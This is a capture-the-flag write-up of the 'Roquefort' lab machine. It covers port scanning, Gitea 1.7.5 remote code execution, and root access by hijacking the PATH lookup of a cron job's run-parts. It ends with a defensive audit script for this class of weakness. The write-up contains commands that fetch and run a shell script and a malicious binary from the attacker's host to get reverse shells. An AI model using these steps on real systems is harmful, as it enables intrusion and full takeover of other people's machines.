# Roquefort

## Gaining Access

Nmap scan:

```
$ nmap -p- --min-rate 3000 -Pn 192.168.157.67 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-16 10:40 +08
Nmap scan report for 192.168.157.67
Host is up (0.17s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE  SERVICE
21/tcp   open   ftp
22/tcp   open   ssh
2222/tcp open   EtherNetIP-1
3000/tcp open   ppp
```

FTP does not allow for anonymous logins.

### Web Enum -> Gitea RCE

Only port 3000 has a webpage:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-a6fd9dffe1746a364c5a5da10f6b98c8d172f831%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

In the bottom left, we can see the Gitea version, 1.7.5, which is vulnerable to RCE:

```
$ searchsploit gitea 1.7.5
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
Gitea 1.7.5 - Remote Code Execution                        | multiple/webapps/49383.py
----------------------------------------------------------- ---------------------------------
```

Gitea allows anyone to register an account, so we create one and point the exploit script at it with these settings:

```python
USERNAME = "test123"
PASSWORD = "test123"
HOST_ADDR = '192.168.45.196'
HOST_PORT = 3000
URL = 'http://192.168.157.67:3000'
CMD = 'wget http://192.168.45.196:21/shell.sh && bash shell.sh'
```

We would then get a reverse shell:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-40a59beb0da30ff57202b290246299b0f0c175ba%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### Cronjob Path -> Root

`linpeas.sh` picked up that we can write to a directory in the systemd PATH:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-4bc14d27234b4c60e600cc1625bf0df911d68ac5%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

This means we just need to find a process run by `root` that invokes a binary by bare name rather than by its full path. I used `pspy64` to find such a process.

```
2023/07/15 22:55:01 CMD: UID=0    PID=13493  | run-parts --report /etc/cron.hourly 
```

`run-parts` is called without a full path, so it should work.

```
chloe@roquefort:/tmp$ which run-parts
/bin/run-parts
```

Since `/bin` is the last directory in PATH, we can place our malicious `run-parts` binary in `/usr/local/bin`, which is searched first and so gets executed instead.

```bash
cd /usr/local/bin
wget 192.168.45.196:21/run-parts
chmod 777 run-parts
```

Then, start a listener and wait for `root`'s hourly cron job to execute the binary:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-12b8d481a0a764a0706722c678a6040a5afd2f9f%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>
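The root cause here is the combination of a writable PATH directory and a privileged job that resolves its program through PATH. As an added example (not part of the original writeup), the script below audits a host for both conditions: it lists PATH directories with the group- or world-write bit set, and it parses `/etc/crontab`-style lines to report programs that are invoked by bare name, including ones hidden behind `&&` or `||` as in the `run-parts` line above. The crontab excerpt is constructed for the example (modelled on Debian's default hourly/daily lines) and the script assumes GNU `stat`.

```shell
#!/usr/bin/env bash
# Added audit example, not part of the original writeup. It checks the two
# conditions that together make the PATH hijack above possible:
#   1. a directory on PATH that is group- or world-writable, and
#   2. a root cron entry that starts a program by bare name ("run-parts")
#      instead of by absolute path ("/bin/run-parts").
# The crontab text below is constructed for this example. Uses GNU stat.

# Print "<dir> <mode>" for every directory in the colon-separated PATH in $1
# whose group- or other-write bit is set. Entries that do not exist are skipped.
writable_path_dirs() {
    local dir mode
    local IFS=':'
    for dir in $1; do
        [ -d "$dir" ] || continue
        mode=$(stat -c '%a' "$dir")               # octal, e.g. 755 or 777
        if [ $(( 0$mode & 022 )) -ne 0 ]; then    # leading 0 forces octal arithmetic
            printf '%s %s\n' "$dir" "$mode"
        fi
    done
}

# Read /etc/crontab-style lines ("m h dom mon dow user command" or
# "@daily user command") on stdin and print the program name of every command
# segment that is neither an absolute path nor a shell builtin. Segments are
# split on && || ; | and parentheses, so the run-parts in
# "cd / && run-parts --report /etc/cron.hourly" is caught.
relative_cron_programs() {
    awk '
        /^[[:space:]]*(#|$)/ { next }                        # comment or blank line
        /^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=/ { next }      # VAR=value line (PATH=, SHELL=)
        {
            skip = ($1 ~ /^@/) ? 2 : 6                        # schedule fields + user field
            cmd = ""
            for (i = skip + 1; i <= NF; i++) cmd = cmd " " $i
            n = split(cmd, seg, /&&|\|\||;|\||\(|\)/)
            for (i = 1; i <= n; i++) {
                gsub(/^[[:space:]]+|[[:space:]]+$/, "", seg[i])
                if (seg[i] == "") continue
                split(seg[i], w, /[[:space:]]+/)
                prog = w[1]
                if (prog ~ /^\//) continue                    # absolute path: resolved without PATH
                if (prog ~ /^(cd|test|\[|exit|true|false|echo|export)$/) continue
                print prog
            }
        }'
}

# Constructed /etc/crontab excerpt, modelled on Debian defaults: the hourly and
# daily lines call run-parts by bare name; the backup line uses an absolute path.
SAMPLE_CRONTAB=$(cat <<'EOF'
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
0  3    * * *   root    /usr/local/sbin/backup.sh --full
@reboot         root    sync-agent --daemon
EOF
)

# Demonstration on a scratch PATH where one directory is world-writable,
# standing in for the writable /usr/local/bin found by linpeas above.
demo() {
    local root
    root=$(mktemp -d)
    mkdir -p "$root/usr/local/bin" "$root/usr/bin" "$root/bin"
    chmod 777 "$root/usr/local/bin"
    chmod 755 "$root/usr/bin" "$root/bin"
    echo "== writable PATH directories =="
    writable_path_dirs "$root/usr/local/bin:$root/usr/bin:$root/bin"
    echo "== cron programs resolved through PATH =="
    printf '%s\n' "$SAMPLE_CRONTAB" | relative_cron_programs
    rm -rf "$root"
}

demo
```

On a real host, feed it the live values instead of the constructed ones: `writable_path_dirs "$(grep '^PATH=' /etc/crontab | cut -d= -f2-)"` and `relative_cron_programs < /etc/crontab` (plus `/etc/cron.d/*`). Any directory it prints should be root-owned with mode 755, and any program it prints should either be given by absolute path or have cron's `PATH=` line restricted to root-only directories; either fix on its own closes the hijack shown above.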
